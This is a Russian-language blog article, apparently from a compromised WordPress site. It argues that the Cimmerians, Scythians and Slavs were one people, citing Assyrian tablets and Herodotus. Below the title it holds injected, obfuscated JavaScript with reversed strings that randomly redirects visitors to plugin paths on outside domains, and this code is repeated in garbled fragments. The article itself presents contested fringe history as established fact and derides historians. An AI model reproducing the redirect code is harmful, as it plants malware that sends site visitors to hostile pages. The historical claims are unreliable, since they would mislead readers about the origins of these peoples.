Исследования Мир

Куда исчезли киммерийцы или откуда взялись скифы?


$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>

Многократно обращались мы с вами к факту (именно факту), что «внезапно исчезнувшие неизвестно куда» с обширнейших территорий Евразии около 6-го века н.э. скифы и в то же самое время «внезапно появившиеся неизвестно откуда» на той же территории славяне (та же этническая группа, та же культура, те же обычаи, та же государственность) — есть один и тот же народ. Но откуда же взялись скифы, которых с 6-го века стали называть славянами? Вот, интересно, что уже и раньше со скифами происходил (или с ними это выделывали историки?) — такой же фокус: они внезапно, из ниоткуда, появились на месте другого столь же многочисленного и родственного им народа — киммерийцев. В этой статье я покажу то, что давно должно быть очевидным, но по каким-то причинам постоянно искусственно затуманивается: то, что киммерийцы и скифы есть один народ.

Впервые Киммерийские племена засветились в истории в 714 г. до н. э., когда они разгромили царя урартов Русу I, который решил отложиться от Ассирии. Сделали они это, по всей вероятности, по заказу царя Ассирии Синаххериба — что очень важно и примечательно. До нас дошло несколько клинописных документов той поры, которые хранятся в Британском музее. Один из этих документов сообщает о разгроме урартского войска весной 714 года до н. э.: «…когда царь урартский пошел на страну Гамир, все его войско было побито, сам он, его наместники с их войском были отброшены…»Другой документ того же периода сообщает, что в сражении участвовала практически вся армия Урарту, под руководством царя, главнокомандующего-туртана и 13 областеначальников. Несмотря на это, урарты потерпели сокрушительное поражение, а туртан и два областеначальника попали в плен. Царь Урарту покинул отступившие остатки войска и поспешил в Урарту.

Еще одна табличка описывает ситуацию, сложившуюся в Урарту после поражения, где царит паника из-за страха перед Ассирией: «…они очень боятся царя, моего господина; как женщины, они дрожат и бездействуют…»Из всего этого видно, что киммерийцы были в ту пору всего лишь передовым войском — конница и лучники — ассирийского царя. И хотя в ту пору не было редкостью нанимать на службу целые народы, по всему видно, что киммерийцы, не являясь ассирийцами, базировались в самой Ассирии. Об этом свидетельствуют как письменные документы, так и лингвистика киммерийцев (основанная на ассирийском языке), и их действия.

Около 679 — 676 г. до н.э., в Ниневии (столице Ассирии) был составлен интересный документ — свидетельство сделки о продаже крупных земельных владений неким Ишди-Харраном «начальником полка киммерийского». «Киммерийский полк» — это конные лучники и ратники, проживающие в Ассирии (и владеющие в ней значительными земельными уделами) и состоящие на ассирийской воинской службе. Отметим пока для себя: киммерийцы впервые появляются и упоминаются в истории как некая диковинная воинская сила, взращённая в недрах Ассирии, но не являющаяся этнически ассирийской. Позднее мы еще вернемся к этому вопросу всех вопросов — а как они в Ассирии то оказались? А где и кто они были — до Ассирии?

Но теперь давайте проследим их путь с того момента, как они «засветились» как самостоятельный народ — ну, или как марионетка, как «вышибала», как наемник в ту пору еще процветающей Ассирийской империи. Интересно, что после упоминания в связи с подавлением восстания Урарты киммерийцы на несколько десятилетий пропадают из виду — фактически, они возвращаются в недра Ассирии, как меч в ножны. И следующий раз этот меч будет обнажен, и киммерийцы вновь появятся на сцене как карающий меч Ассирии. Но на этот раз меч уже не спешит вернуться в свои ассирийские ножны, и начинает свое первое боевое турне по Азии и Европе. Начали они его вновь с Урарту, которое опять пыталось добиться независимости. Не добилось. Усмирив Урарту во второй раз, киммерийцы двинулись далее во Фригию. В 676–674 г. до н.э. они разгромили фригийские войска и оказались единственной реальной силой во всем регионе. Страбон — античный историк и географ рассказывает, что фригийский царь Мидас, тезка знаменитого героя греческого мифа, покончил жизнь самоубийством, чтобы не попасть в руки киммерийцев.

Киммерийцы не спешат покинуть Фригию и вернуться в Ассирию — тем более, что Ассирия не была их родиной. Они потихоньку начинают устраиваться на новом месте, беря под свой контроль города и осваивая богатые пастбища. Кроме того, Фригия оказалась очень удобным стратегическим плацдармом для дальнейшей экспансии — в сторону Лидии и Табала. Руководители этих государств вполне серьезно отнеслись к угрозе и предпочли не ждать вторжения, но добровольно согласились признать себя данниками Ассирии. Это говорит о том, что прямо или косвенно киммерийцев в ту пору еще ассоциировали с наемниками Ассирии. В конце 670-х — начале 660-х годов до н.э. царь Лидии Гиг (Гуггу) жалуется ассирийскому царю Ашшурбанипалу, что его киммерийцы «как нашествием саранчи, вся Лидия была покрыта (ими)». Он уверяет Ашшурбанипала, что он и так — хороший мальчик, и что его страна теперь обязуется «ежегодно, без перерыва, присылать тяжелую дань» Ассирии.

Ашшурбанипал в своей «летописи» довольно ехидно комментирует произошедшее: «…Гонца своего, которого он (царь Лидии) постоянно присылал приветствовать меня, он прекратил посылать… Но гимаррайцы, которых он топтал под собою, поднялись с именем моим и ниспровергли всю его страну…»Но чувства царя Ассирии по отношению к киммерийцам были, как вы можете догадаться, смешанными: он сам их уже боялся, и только и думал — как их ослабить, или как от них избавиться? Подобная же ситуация повторится и когда Рим начнет набирать нанимать на военную службу целые армии скифов. Да, они принесут Риму много славы — но еще больше проблем. Но это все будет позднее, а пока предки этих самых скифов начинали ощущать свою реальную силу.

Около 657 г. до н.э. было написано сохранившееся письмо к царю Ашшурбанипалу от астролога Аккуллану, который занимал в ассирийском жречестве одну из ключевых должностей.«…Текст письма указывает на то, что в 657 г. до н.э. киммерийцы не просто занимали какую-то область в Малой Азии, но и рассматривались как ведущая политическая сила в регионе, угрожавшая Ассирии … Аккуллану наделяет царя киммерийцев титулом «царь вселенной» … Следует заметить по этому поводу, что согласно месопотамским представлениям, в мире мог существовать лишь один «царь вселенной» и этот титул не мог принадлежать двум царям одновременно. Таким образом, речь идет о беспрецедентной ситуации, когда титул «царь вселенной» принадлежит иностранному, а не ассирийскому царю…». А.И. Иванчик

Это, сами понимаете, было уже слишком для ассирийских царей, считавших себя наследниками богов. Народец, который они взрастили для своих воинских побед — вышел из под прямого контроля. И тогда Ассирия решается на роковой шаг: раздавить мощь киммерийцев, покуда те повернули свой меч против Ассирии-матушки. У Ассирии была своя достаточно мощная армия, но находясь в зените своей славы (то есть — близко к падению и разложению) Ассирия предпочитала делать все руками наемников. Ну а главным принципом, на котором строились все великие империи, был принцип — разделяй и властвуй. И Ассирия решается на отчаянный шаг: она отдает все ассирийские земли и все владения киммерийцев в руки их ближайших племенных родственников, которые столь же внезапно, как и киммерийцы, обнаруживаются вдруг прямо во чреве Ассирии — скифы.

Надо заметить, что союз киммерийских племен не отличался ни этнической, ни политической монолитностью. Со времени своей депортации в Ассирию, да и ранее, «киммерийцы» (так звали их ассирийцы) представляли из себя союз около десяти различный племенных народов. Для удобства историки вводят понятие западных и восточных киммерийцев:

…Уже в самых ранних переднеазиатских известиях киммерийцы предстают в виде двух групп племен — западных и восточных. Их разделение на две ветви наблюдается и позднее…

А.И. Иванчик.

Так вот, если те киммерийцы, о которых мы говорили до сих пор, условно могут быть названы «западными» киммерийцами, то что же сталось с «восточными»? Вот их то Ассирия и поспешила (возможно, именно — поспешила) использовать по принципу «клин клином вышибают». В 650—640-х годах до н. э. из Ассирии выходит еще одна родственная киммерийцам (фактически, «восточные киммерийцы») группа и, вместе с ассирийской армией, направляется в Малую Азию на усмирение вышедших из под контроля «западных киммерийцев».

И вот с появлением на сцене этих «восточных киммерийцев» и связано первое упоминание в истории народа скифов — именно так именуют хроники этих людей. Согластно некоторых историков скифы оказались в Ассирии «случайно» — проходили, мол, мимо, а царь Ашшурбанипал просто позволил им пройти через свою империю. А пока они «проходили» (как утверждал Геродот), они так подружились с ассирийцами, так усвоили их язык и культуру, так прониклись их идеалами, что решили связать свою жизнь с Ассирией и сражаться за нее. Неизвестно, при этом — откуда и куда «шли» эти невесть откуда взявшиеся скифы. Все, что нам известно из истории — это то, что скифов Ассирия на самом деле завоевала, подчинила себе и депортировала на свою территорию точно в то же время и при тех же обстоятельствах, что и киммерийцев.

Славянская загадка. Часть 1: Скифы, славяне.

Так вот, вместе с армией Ашшурбанипала скифы направились теперь в Малую Азии для войны с родственными им киммерийцами. Согласно Геродота, скифы как-то разом на голову разгромили и уничтожили киммерийцев у Киликии недалеко от границы с Ассирией. Возглавлявший киммерийские племена вождь Тугдамме, он же Лигдамис, Лигдамид или Дугдамме, якобы погиб в этой битве, и киммерийцы куда-то рассеялись и исчезли. На самом же деле о событиях войны между киммерийцами и скифами почти ничего не известно — кроме поверхностных утверждений Геродота — зато спекуляций тут море. Киммерийцы, о которых писали, что их как саранчи — бесследно исчезают — а на их месте появляются скифы, которых тоже оказывается — как саранчи. На сегодняшний день исследователи вынуждены признать, что никакого замещения киммерийцев скифами не было. К примеру, анализируя данные из ассирийских источников, Иванчик пишет, что «…реальные киммерийцы, с которыми ассирийцам приходилось сталкиваться в конце VIII—VII вв. до н. э., были в культурном отношении близки позднейшим скифам…». Действительно, они были так близки, что это делает затруднительным отличить при раскопках артефакты принадлежащие скифам от предметов, некогда бывших собственностью киммерийцев.

Чтобы еще раз подчеркнуть весь маразм той установки, что скифы истребили и вытеснили киммерийцев, обратимся еще раз к древним источникам, к тому же Геродоту, который предлагает просто-таки фантастическую версию происходящего — которую и пытаются продвигать историки. Но вчитавшись в нее вы и сами поймете — о чем речь. Я сейчас расскажу как, согласно Геродота, исчезли киммерийцы и появились скифы. И, честное слово, в этом бреде великого историка — больше смысла, чем во всем гавканье последующих поколений ученых, пытавшихся как-то «сгладить» явно фантастический рассказ Геродота. Так вот, когда киммерийцы, этот неустрашимый и прежде никем не побежденный народ, услышали, что на них идут скифы (о которых, якобы, в ту пору никто и не знал — кто такие), то они так перепугались, что лишились рассудка. Во время совета старейшин киммерийцев их мнения разделились: по мнению элиты киммерийцев, следовало сражаться за свою страну и победить или погибнуть в сражении. С другой стороны народ по каким-то причинам не хотел воевать: Геродот смеется трусости простого люда перед лицом опасности.

Слушаем Геродота далее. Он пишет, что в конце концов Совет киммерийцев постановил: разделить свой народ на два лагеря и этим лагерям сражаться до последней капли крови — чтобы, наконец, выяснить — кто из них прав? Сказано-сделано. Разделившись на две равные части, киммерийцы сражались друг с другом, пока все не погибли. Скифам, которые подошли туда позднее, по счастливому для них совпадению — как раз под конец битвы — оставалось только похоронить киммерийцев и занять их теперь пустую, бесхозную страну. И их место в истории.

Ну а что там было на самом деле, думаю, вы уже догадались. Если вам не надо, подобно профессиональным историкам, дрожащим за свое место под солнцем, натягивать сову на глобус — вы без труда поймете, что произошло. Действительно, произошла глупая братоубийственная война — между киммерийцами и скифами. Действительно, народ разделился как бы надвое. Но все же и речи не идет о каком-то полном истреблении киммерийцев: просто скифская партия, грубо говоря, взяла верх. Потому, наверное, ни другие источники, ни археология — ничего не знают о такой битве. Если она и была, то имела масштаб ограниченный, на что намекает и сам Геродот, говоря, что сражалась в основном знать. Народ же после сражения просто… рассеялся. А ведь действительно: о киммерийцах с тех пор не было уже слышно — зато стало всем громко слышно о скифах. А по сути — это один народ, и нечто подобное произойдет с этим народом еще раз, когда «на смену» скифам, ушедшим в никуда, в один миг явились славяне — из ниоткуда.

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, ВКонтакте

4/5

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.